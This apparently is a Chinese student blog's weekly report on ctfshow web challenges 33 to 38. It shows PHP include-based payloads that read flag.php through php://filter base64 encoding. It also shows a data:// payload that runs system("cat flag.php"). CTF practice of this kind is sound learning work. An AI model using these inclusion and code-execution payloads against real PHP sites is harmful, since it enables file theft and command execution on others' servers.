第五周周报

最新推荐文章于 2024-10-16 19:29:17 发布
最新推荐文章于 2024-10-16 19:29:17 发布
阅读量70 收藏
点赞数
文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yyw260187453/article/details/132124520
版权

ctfshow

1、web33

在这里插入图片描述
过滤这多
不过还可以用include文件包含构造payload来读取flag

?c=include$GET[a]?>&a=flag.php

伪协议读取

?c=include$_GET[a]?>&a=php://filter/convert.base64-encode/resource=flag.php

进行base64解密
在这里插入图片描述

2、web34

在这里插入图片描述
加了一些过滤发现还可以使用上题思路
payload

?c=include$_GET[a]?>&a=php://filter/convert.base64-encode/resource=flag.php

在这里插入图片描述
解码
在这里插入图片描述

3、web35和web36

同上题思路依旧可以

4、web37

在这里插入图片描述
可以使用data协议在include函数中执行php代码
在这里插入图片描述
构造payload

?c=data://text/plain;base64,PD9waHAgc3lzdGVtKCJjYXQgZmxhZy5waHAiKTs/Pg==

查看源代码
在这里插入图片描述

5、web38

在这里插入图片描述
因为咱上一题使用的base64加密解密执行的所以上一题的payload依旧可以使用

?c=data://text/plain;base64,PD9waHAgc3lzdGVtKCJjYXQgZmxhZy5waHAiKTs/Pg==

在这里插入图片描述

总结

学到了一些协议读取文件或者执行php代码

Delancey.
关注
贷款违约预测第五周报
zdxy921的博客
10-23 207
已有模型参数调整 上对已有的模型的参数进行了一次调整,有一定效果,这继续对剩余没有调整的参数进行调参。 对subsample和colsample_bytree参数进行调参: 最优参数为subsample:0.7,colsample_bytree:0.8 再对learning_rate和n_estimators两个参数进行调参: learning_rate和n_estimators两个参数跑得比较久,跑了18个小时,最后得到最优参数是learning_rate:0.05,n_estimators
第五周报1
08-08
在数据结构课程设计的第五,何哲宇、耿海直和胡英东三位同学主要集中在模块代码的完善、算法设计以及用户界面的初步构建上。以下是对他们上完成工作和本计划的详细分析。 首先,他们完成了各个关键模块的代码...
第5周报
qq_52538843的博客
12-23 331
学习内容: 1.java 2.啊哈算法 二、啊哈算法 1.队列(先进先出) 1.书上的问题(解码) # include<stdio.h> int main(void) { int a[102] = {0,6,3,1,7,5,8,9,2,4}; int head = 1; int tail = 10; while(head<tail) { printf("%d",a[head]); head++; a[tail] = a[head]; tail++; head+
机器学习第五周报
2301_77762389的博客
05-27 249
首先通过重温之前尝试做的宝可梦和数码宝贝的分类器,复习一下做该分类器的过程,在复习这些过程的同时,来发现之前没考虑到的机器学习的问题,通过数学推导来简要分析部分机器学习的原理,我们发现训练资料数目越大,sample到坏资料的几率就越低,若|H|变小,sample到坏资料的概率也会变低。同时也开始学习了“深度学习新的优化器”这一章节,本通过对比之前学习的一些算法,来发现这些算法的一些不足,然后进一步改进这些算法。
高级实训第五周报
jimmywu123的博客
10-27 487
基本完成了数据预处理与特征选择的部分,并使用KNN和决策树这两个简单的模型达到了接近0.7的评分。本主要从上次课提及的一些内容出发,学习一些更复杂的模型。 随机森林 随机森林是Bagging算法的一个特例,基分类器全部采用决策树。它随机选择一些特征并构建决策树,通过投票等策略综合随机森林中所有树对样本的预测结果,从而得到随机森林的预测结果。这是一种通过引入随机性并综合大量结果来降低方差,缓解单一决策树的过拟合问题的策略。 XGBoost XGBoost是GBDT(梯度提升决策树)的..
第五周报(3.29~4.5)
weixin_45927841的博客
04-05 204
周报 1.数组的地址运算 LOC(i1,i2,…,in)=a+i1m2m3*…mn+i2m3m4…mn+…+in-1*mn+in 2.稀疏矩阵和二维数组的转换 三元数组法 十字链表 3.广义表 求表头 求表尾 求长度 求深度 4.JAVA环境配置 安装JDK 安装IntelliJ IDEA 配置环境变量 5.JAVA学习 java数据类型 运算符 流程控制 选择和循环 ...
创新实训第五周报
hu15144354443的博客
05-29 372
el-dropdown-item @click="deleteTalk(item)">删除对话</el-dropdown-item>// 遍历 talkList 数组,找到对应的对话历史数据项(根据 "talkId" 进行匹配),并更新对应的消息数据为当前的消息列表 this.messages。<el-dropdown-item @click="reTalk(item)">进入对话</el-dropdown-item>// 移除本地存储中的 "talkId" 项,并重置 tid 属性。
SMU Summer 2024 第5周报
qq_39804992的博客
08-10 200
学到了排列组合的逆元写法和Lucas定理。更快,但只能输出结果。可快速预处理出素数表。
java实习第一周报,大学生实习周报
weixin_35719775的博客
03-12 1328
无论学习什么专业,从事什么职业,我们都需要提前实习啦,把理论知识结合起来运用到实践当中去。下面是由出国留学网小编为大家整理的“大学生幼儿园实习周报”,仅供参考,欢迎大家阅读。大学生幼儿园实习周报【一】第一俗话说:万事开头难。刚进园的时候我感到了很大的困难,毫无工作经验的我,应对这些性格迥异的孩子们,我觉得毫无头绪。每一天早上我都会面带微笑和全托、白托的孩子们打招呼,但是由于我是新老师,很...
第一周报
qq_52612197的博客
11-22 2593
第一周报 这是学习前端的第一,发现有好多东西都要慢慢来学习。 1.网页基本结构 <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Document</title> &l
第五周报0408-20192115641
08-08
这篇周报是关于一个名为“校园导览系统”的项目,该项目由计算机学院的团队成员兰学超、熊瑞东、李培阳等人共同负责。报告主要涵盖了本的工作进展、下的工作计划以及项目的基本需求和限制条件。 在本的工作...
电力设备与新能源行业5月第5周报:异质结量产转换效率刷新最高纪录.pdf
09-12
电力设备与新能源行业5月第5周报聚焦了一个重要的技术突破——异质结量产转换效率刷新了历史最高纪录。这一成就对于整个行业来说具有重大的意义,因为转换效率是衡量太阳能电池性能的关键指标,它直接影响到光伏...
计科-编译原理课程设计-第9组-第5周报1
08-03
在编译原理课程设计中,第9组在第5主要关注了三个核心领域:修复错误(bug)、编写测试代码以及语义分析的学习与设计。这些活动是编译器开发的关键阶段,对于理解和构建一个完整的编译器至关重要。 首先,修复...
第五工作周报1
08-08
在本的工作周报中,7组的核心任务是开始考生管理系统的前端开发。这个系统对于管理和组织各类考试来说至关重要,因为它涉及到考生信息的录入、管理以及考试的顺利进行。目前,前端开发进度已达90%,表明工作推进...
0.0.0.0 127.0.0.1等几个特殊的IP地址
zhurobert的博客
10-10 526
0.0.0.0 127.0.0.1 255.255.255.255等特殊地址
PHP智慧餐饮新风尚点餐系统
2401_84593753的博客
10-10 603
总的来说,智慧餐饮新风尚点餐系统不仅为顾客带来了便捷、高效、个性化的点餐体验,也为餐厅提供了有力的运营支持。它让美食与科技实现了完美结合,让我们在享受美食的同时,也能感受到科技的魅力。如果你还没有尝试过这款点餐系统,不妨找个机会去体验一下,相信它会给你带来不一样的惊喜!
信息收集2
Taurus_HanKun的博客
10-16 508
这个文件是为了网络搜索引擎爬虫程序准备的目的就是为了让爬虫文件爬取网站的信息,便于搜索引擎收录网站,存在的风险就是这个目录记录的是网站的目录结构。一直在网站的域名后面添加字符串,如果返回结果是404,表示页面不存在,如果是其他结果的值,说明这个页面是存在的。检查网站的一些小图片,将这些图片的MD5值,和特定的cms中的图片MD5做比对,一样则说明用的是同一个cms。从不同的位置去ping,如果返回的IP地址是相同的,代表没有使用cdn,如不同则代表使用了cdn。
【信息安全管理与评估】2023年全国职业院校技能大赛赛题第06套
最新发布
Play_Sai的博客
10-16 539
取证的信息可能隐藏在正常的、已删除的或受损的文件中,您可能需要运用编码转换技术、加解密技术、隐写技术、数据恢复技术,还需要熟悉常用的文件格式(如办公文档、压缩文档、图片等)A 集团的 Ubuntu 服务器被黑客入侵,该服务器的 Web 应用系统被上传恶意软件,系统文件被恶意软件破坏,您的团队需要帮助该公司追踪此网络攻击的来源,在服务器上进行全面的检查,包括日志信息、进程信息、系统文件、恶意文件等,从而分析黑客的攻击行为,发现系统中的漏洞,并对发现的漏洞进行修复。如私设 DHCP 服务器关闭该端口。
编写一份CAD工程师第十五周报
03-10
5. 继续学习了相关的CAD标准和规范,以提高自己的工作质量。 下工作计划: 1. 继续完成客户的CAD图纸修改需求,并进行测试和验收。 2. 学习并掌握更多的CAD技术和工具,以提高自己的工作效率。 3. 协助同事解决...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值